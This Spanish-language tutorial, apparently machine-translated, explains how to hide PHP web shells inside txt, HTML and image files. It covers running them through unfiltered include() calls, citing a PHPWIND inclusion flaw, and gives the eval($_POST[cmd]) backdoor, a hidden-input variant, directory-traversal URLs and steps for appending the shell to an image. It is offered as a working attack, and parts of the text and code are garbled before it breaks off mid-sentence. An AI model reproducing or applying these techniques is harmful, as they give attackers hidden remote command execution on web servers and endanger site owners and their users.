Debes saber que si simplemente colocas la declaración PHP en la imagen, no se ejecutará de todos modos, porque PHP solo analiza archivos con la extensión php. Por lo tanto, es necesario poder ejecutar las declaraciones PHP ocultas en la imagen. Simplemente usamos las funciones de llamada en PHP: incluir, requerir, etc.
Todavía recordamos el artículo de hace unos días sobre cómo ocultar troyanos en imágenes. Es decir, utilice declaraciones como include("x.gif") en el archivo PHP para llamar a las declaraciones del caballo de Troya ocultas en la imagen. Las declaraciones en ASP son similares. Parece muy oculto, pero si llamas a la imagen directamente, no será difícil para alguien que sepa un poco sobre PHP encontrar algo sospechoso. Dado que es difícil pasar parámetros utilizando el método GET en la URL, no se puede aprovechar al máximo el rendimiento de la inserción del troyano.
La función de inclusión se usa con frecuencia en PHP, por lo que causa demasiados problemas de seguridad. Por ejemplo, la vulnerabilidad de PHPWIND1.36 se debe a la falta de filtrado de las variables detrás de la inclusión. A partir de esto podemos construir declaraciones similares para insertar en archivos PHP. Luego, oculte el troyano en una imagen o archivo HTML, que se puede decir que está más oculto. Por ejemplo, inserte la siguiente declaración en el foro PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Los administradores generales no pueden verlo.
Con la ayuda de la función de inclusión, podemos ocultar troyanos PHP en muchos tipos de archivos, como txt, html y archivos de imagen. Debido a que estos tres tipos de archivos, txt, html y archivos de imagen, son los más comunes en foros y sistemas de artículos, haremos las pruebas en orden a continuación.
Primero cree un archivo PHP test.php. El contenido del archivo es:
<?php.
$prueba=$_GET['prueba'];
@include 'prueba/'.$prueba;
?>
Los archivos Txt son generalmente archivos de descripción, por lo que podemos colocar el troyano de una frase en el archivo de descripción del directorio. Simplemente cree un archivo TXT t.txt. Pegamos la frase Trojan <?eval($_POST[cmd]);?> en el archivo t.txt. Luego visite http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Si ve el archivo t. El contenido del txt resulta correcto. Luego agregue la dirección troyana del micro cliente de puerta trasera PHP a http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > Simplemente agregue cmd en la contraseña y podrá ver los resultados devueltos por la ejecución.
Los archivos HTML, generalmente son archivos de plantilla. Para permitir que el caballo de Troya insertado en el archivo HTML pueda llamarse y ejecutarse sin mostrarse, podemos agregar un cuadro de texto con atributos ocultos en el HTML, como por ejemplo: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> Luego use el mismo método que el anterior. Los resultados devueltos por la ejecución generalmente se pueden ver viendo el archivo fuente. Por ejemplo, utilice la función de ver el directorio de este programa. Vea el contenido del archivo fuente como <input type=hidden value="C:Uniserver2_7swwwtest"> Puedo obtener el directorio como C:Uniserver2_7swwwtest.
Ahora hablemos de archivos de imagen. El truco más venenoso es ocultar el caballo de Troya en la imagen. Podemos editar directamente una imagen e insertar <?eval($_POST[cmd]);?> al final de la imagen.
Después de la prueba, generalmente no afecta la imagen. Luego agregue la dirección del troyano del cliente de la misma manera<